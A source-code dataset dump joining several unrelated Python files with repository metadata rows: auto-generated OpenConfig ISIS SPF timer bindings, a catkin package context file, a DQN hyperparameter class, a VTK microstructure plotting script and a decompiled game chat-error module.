_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
| [
"zblevins@netflix.com"
] | zblevins@netflix.com |
6e5c7d4574ac6bdf771974fca13d24252f6fbbfe | e5ba55ac56d2d07aeebd7253fbe5d186196c9a52 | /catkin_ws/catkin_ws/build/rosserial/rosserial_server/catkin_generated/pkg.installspace.context.pc.py | ae10992ff46064e55de2240a2ca888d8f0938951 | [] | no_license | masiro97/darrsm | 5305a3e7c1fba2635a4925b9e079f45b40162862 | b881d00427d2af5d75ca509a191e57f2890e1ece | refs/heads/master | 2021-05-10T21:57:17.760536 | 2018-01-20T15:13:56 | 2018-01-20T15:13:56 | 111,084,804 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include".split(';') if "/home/cun/catkin_ws/install/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;rosserial_msgs;std_msgs;topic_tools".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosserial_server"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.7.6"
| [
"estrk7120@gmail.com"
] | estrk7120@gmail.com |
2fb1b577624a5c8248e2d3dda1345033e30fd705 | dbe7731552d8e6d1e63cc0f2e27d3810cc61f350 | /hyper_paras/hp_dqn_2015.py | d4c5e2d826930dfa598be045d574d07259694b32 | [] | no_license | ZhangRui111/rl_breakout_tf | 6bb3f57f2b1d52f196323916393234e8abb990ac | 04f259cd3c32eaffbad87fe1035b0f87c96127b0 | refs/heads/master | 2020-04-08T19:24:16.018734 | 2018-12-18T02:42:56 | 2018-12-18T02:42:56 | 159,653,713 | 1 | 1 | null | 2018-12-18T02:42:57 | 2018-11-29T11:12:04 | Python | UTF-8 | Python | false | false | 190 | py | from hyper_paras.base_hyper_paras import BaseHyperparameters
class Hyperparameters(BaseHyperparameters):
def __init__(self):
super().__init__()
self.model = 'dqn_2015'
| [
"zhangruisg111@163.com"
] | zhangruisg111@163.com |
6943c6920b94ac55fc64ba3c743795f09a5b7748 | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2015_01_29_BC_eval/main.py | 9afe65371e8a594387bdee14b3c79e9fe46bed0a | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,530 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 17 16:46:35 2014
@author: nhpnp3
"""
import functions as rr
import numpy as np
import matplotlib.pyplot as plt
filename = 'Results_Ti64_Dream3D_XYdirLoad_210microns_9261el_AbqInp_AnisoLE_005_data_v2_01.vtk'
el = 21
tensor_ID = 1
## The tensorID determines the type of tensor data read from the .vtk file
## if tensorID == 0, we read the stress tensor
## if tensorID == 1, we read the strain tensor
## if tensorID == 2, we read the plastic strain tensor
compl = ['11','22','33','12','23','31']
compd = {'11':0,'22':4,'33':8,'12':1,'23':5,'31':6}
r_real = np.zeros([np.size(compl),el,el,el])
c = 0
for comp in compl:
compp = compd[comp]
r_temp = rr.read_vtk_tensor(filename = filename, tensor_id = tensor_ID, comp = compp)
r_real[c,...] = r_temp.reshape([el,el,el])
print compl
print np.mean(r_real[c,...])
c += 1
euler = rr.read_vtk_vector(filename).reshape([3,el,el,el])
for dispcomp in xrange(np.size(compl)):
plt.close(dispcomp)
## Plot slices of the response
plt.figure(num=dispcomp,figsize=[14,6])
plt.subplot(231)
ax = plt.imshow(euler[0,0,:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice 0')
plt.subplot(232)
ax = plt.imshow(euler[0,np.floor(0.5*el),:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice %s' % np.floor(0.5*el))
plt.subplot(233)
ax = plt.imshow(euler[0,el-1,:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice %s' % (el-1))
dmin = np.min(r_real[dispcomp,...])
dmax = np.max(r_real[dispcomp,...])
plt.subplot(234)
ax = plt.imshow(r_real[dispcomp,0,:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice 0')
plt.subplot(235)
ax = plt.imshow(r_real[dispcomp,np.floor(0.5*el),:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice %s' % np.floor(0.5*el))
plt.subplot(236)
ax = plt.imshow(r_real[dispcomp,el-1,:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice %s' % (el-1)) | [
"noahhpaulson@gmail.com"
] | noahhpaulson@gmail.com |
60a813a4f05609691d978440ce055ad549e189da | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res/scripts/client/messenger/proto/bw_chat2/errors.py | 08901cc5ca868928a6c33929c34e99ea139ac423 | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 7,166 | py | # 2016.05.01 15:25:05 Střední Evropa (letní čas)
# Embedded file name: scripts/client/messenger/proto/bw_chat2/errors.py
from gui.Scaleform.locale.MESSENGER import MESSENGER as I18N_MESSENGER
from gui.Scaleform.locale.INGAME_GUI import INGAME_GUI as I18N_INGAME_GUI
from helpers import i18n, html
from helpers.time_utils import makeLocalServerTime
from messenger.proto.interfaces import IChatError
from messenger.proto.shared_errors import ChatCoolDownError, ClientActionError, I18nActionID, I18nErrorID, ChatBanError
from messenger_common_chat2 import MESSENGER_ACTION_IDS as _ACTIONS
from messenger_common_chat2 import MESSENGER_ERRORS as _ERRORS
from messenger_common_chat2 import MESSENGER_LIMITS as _LIMITS
def getChatActionName(actionID):
actionName = _ACTIONS.getActionName(actionID)
i18nKey = I18N_MESSENGER.chat_action(actionName)
if i18nKey is not None:
i18nName = i18n.makeString(i18nKey)
else:
i18nName = actionName
return i18nName
def getBattleCommandExample(msgText):
i18nKey = I18N_INGAME_GUI.chat_example(msgText)
if i18nKey is not None:
i18nName = html.escape(i18n.makeString(i18nKey))
else:
i18nName = msgText
return i18nName
def getChatErrorMessage(errorID, kwargs):
errorName = _ERRORS.getErrorName(errorID)
i18nKey = I18N_MESSENGER.chat_error(errorName)
if i18nKey is not None:
msg = i18n.makeString(i18nKey, **kwargs)
else:
msg = '{0}\\{1}'.format(errorName, kwargs)
return msg
class _BWChat2I18nError(I18nErrorID):
def getName(self):
return _ERRORS.getErrorName(self.errorID)
def getI18nKey(self):
return I18N_MESSENGER.chat_error(self.getName())
class _BWChat2I18nAction(I18nActionID):
def getName(self):
return _ACTIONS.getActionName(self.actionID)
def getI18nName(self):
return getChatActionName(self.actionID)
class _ActionCoolDownError(ChatCoolDownError):
def createAction(self, actionID):
return _BWChat2I18nAction(actionID)
class _BattleCommandError(IChatError):
__slots__ = ('_example', '_coolDown')
def __init__(self, command):
super(_BattleCommandError, self).__init__()
self._example = getBattleCommandExample(command.msgText)
self._coolDown = command.cooldownPeriod
class _BattleCommandCoolDownError(_BattleCommandError):
def __init__(self, command):
super(_BattleCommandCoolDownError, self).__init__(command)
self._coolDown = command.cooldownPeriod
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMANDINCOOLDOWN_LIMITED, self._example, self._coolDown)
class _BattleCommandGenericError(_BattleCommandError):
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMAND_GENERIC_ERROR, strArg1=self._example)
class _SimpleActionError(ClientActionError):
def createError(self, errorID):
return _BWChat2I18nError(errorID)
def createAction(self, actionID):
return _BWChat2I18nAction(actionID)
class _AdminCommandError(IChatError):
__slots__ = ('_error',)
def __init__(self, error):
super(_AdminCommandError, self).__init__()
self._error = error
def getMessage(self):
return i18n.makeString(I18N_MESSENGER.SERVER_ERRORS_CHATCOMMANDERROR_MESSAGE, error=self._error)
class _SimpleAdminCommandError(_AdminCommandError):
def __init__(self, errorID, kwargs = None):
super(_SimpleAdminCommandError, self).__init__(getChatErrorMessage(errorID, kwargs or {'actionName': i18n.makeString(I18N_MESSENGER.CUSTOM_CLIENT_ACTION_ADMIN_CHAT_COMMAND)}))
class _AdminCommandI18nError(_AdminCommandError):
def __init__(self, keys, kwargs):
super(_AdminCommandI18nError, self).__init__(i18n.makeString(keys, **kwargs))
class _AdminCommandCoolDownError(_AdminCommandError):
def __init__(self):
super(_AdminCommandCoolDownError, self).__init__(i18n.makeString(I18N_MESSENGER.CLIENT_ERROR_COMMAND_IN_COOLDOWN_WO_NAME, floatArg1=_LIMITS.ADMIN_COMMANDS_FROM_CLIENT_COOLDOWN_SEC))
def createCoolDownError(actionID):
command = _ACTIONS.adminChatCommandFromActionID(actionID)
if command:
return _AdminCommandCoolDownError()
else:
command = _ACTIONS.battleChatCommandFromActionID(actionID)
if command:
return _BattleCommandCoolDownError(command)
if _ACTIONS.isRateLimitedBroadcastFromClient(actionID):
coolDown = _LIMITS.BROADCASTS_FROM_CLIENT_COOLDOWN_SEC
elif actionID == _ACTIONS.FIND_USERS_BY_NAME:
coolDown = _LIMITS.FIND_USERS_BY_NAME_REQUEST_COOLDOWN_SEC
elif actionID == _ACTIONS.GET_VOIP_CREDENTIALS:
coolDown = _LIMITS.VOIP_CREDENTIALS_REQUEST_COOLDOWN_SEC
else:
coolDown = None
return _ActionCoolDownError(actionID, coolDown)
def createBroadcastError(args, broadcastID):
errorID = args['int32Arg1']
if not _ACTIONS.isRateLimitedBroadcastFromClient(broadcastID):
raise AssertionError
error = errorID == _ERRORS.IN_CHAT_BAN and ChatBanError(makeLocalServerTime(args['floatArg1']), args['strArg1'])
elif errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(broadcastID, _LIMITS.BROADCASTS_FROM_CLIENT_COOLDOWN_SEC)
else:
error = _SimpleActionError(broadcastID, errorID)
return error
def createAdminCommandError(args):
errorID = args['int32Arg1']
if errorID == _ERRORS.IN_COOLDOWN:
error = _AdminCommandCoolDownError()
else:
error = _SimpleAdminCommandError(errorID)
return error
def createBattleCommandError(args, command):
errorID = args['int32Arg1']
error = None
if errorID == _ERRORS.IN_COOLDOWN:
error = _BattleCommandCoolDownError(command)
elif errorID == _ERRORS.GENERIC_ERROR:
error = _BattleCommandGenericError(command)
return error
def createVOIPError(args, actionID):
errorID = args['int32Arg1']
error, logOnly = None, False
if actionID == _ACTIONS.GET_VOIP_CREDENTIALS:
if errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(_ACTIONS.GET_VOIP_CREDENTIALS, _LIMITS.VOIP_CREDENTIALS_REQUEST_COOLDOWN_SEC)
elif errorID == _ERRORS.GENERIC_ERROR:
logOnly = True
error = 'The player has received the error to the request for getting of voip credential. Perhaps voip connection to the server is lost, the server is reconnecting to voip.'
return (error, logOnly)
def createSearchUserError(args):
errorID = args['int32Arg1']
error = None
if errorID == _ERRORS.IN_COOLDOWN:
error = _ActionCoolDownError(_ACTIONS.FIND_USERS_BY_NAME, _LIMITS.FIND_USERS_BY_NAME_REQUEST_COOLDOWN_SEC)
elif errorID in (_ERRORS.IS_BUSY, _ERRORS.WRONG_ARGS):
error = _SimpleActionError(_ACTIONS.FIND_USERS_BY_NAME, errorID)
return error
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\messenger\proto\bw_chat2\errors.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:25:05 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
